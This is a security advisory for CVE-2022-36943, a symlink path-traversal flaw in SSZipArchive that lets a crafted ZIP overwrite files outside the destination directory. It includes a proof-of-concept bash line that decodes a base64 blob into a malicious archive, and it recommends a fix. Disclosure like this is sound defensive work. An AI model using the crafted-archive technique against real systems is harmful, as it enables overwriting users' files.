Headline
CVE-2022-36943: SSZipArchive Arbitrary File Write Vulnerability
SSZipArchive versions 2.5.3 and older contain an arbitrary file write vulnerability due to lack of sanitization on paths which are symlinks. SSZipArchive will overwrite files on the filesystem when opening a malicious ZIP containing a symlink as the first item.
Vulnerability Description:
SSZipArchive typically sanitizes file paths to ensure that no files are written outside of the provided destination directory argument. However, symlinks are also supported and have no sanitization checks performed on the symlink’s target path.
An attacker can therefore embed a symlink in a ZIP archive pointing to a location of their choosing as the first file in the archive to first create the symlink. If a regular file in the ZIP has the same name as the symlink, the library will open and implicitly follow the symlink using an fopen() call, and the contents of the file are written to the symlink target.
An example file may look like the following, where the first entry is a symlink whose target is …/test:
$ unzip -v ./symlink_escape.zip
Archive: ./symlink_escape.zip
Length Method Size Cmpr Date Time CRC-32 Name
-------- ------ ------- ---- ---------- ----- -------- ----
7 Stored 7 0% 06-30-2022 06:14 85e2e03c test
5 Defl:N 7 -40% 06-30-2022 06:14 3610a686 test
-------- ------- --- -------
12 14 -17% 2 files
Proof of Concept:
The following bash script will un-base64 and uncompress an .xz file containing a maliciously crafted ZIP archive.
echo -n “/Td6WFoAAATm1rRGAgAhARYAAAB0L+Wj4ADLAFxdACgSvGAol9VpzGR79fbdQZYxkTvx1S6doFjMMPFDEMyTmKrcgRgnOk+lDGZg51l0XJsdSne7oHE79HfM7ZzptavRzCqA5+gmfZMSfAeYDS+4bGvA2k6hII8S2qgAAMU3KxoPPYbUAAF4zAEAAADOOX2wscRn+wIAAAAABFla” | base64 -d | xz -d > symlink_escape.zip
The symlink_escape.zip file can then be used in any application that handles a ZIP archive using SSZipArchive, including its samples. A file named test containing hello will be written to the destination directory’s parent after unzipping completes.
Recommendation:
Add path sanitization checks to the symlink’s target to ensure it’s a subdirectory of the destination path. Symlinks which are not relative to the destination path should be ignored unless the user explicitly requests it.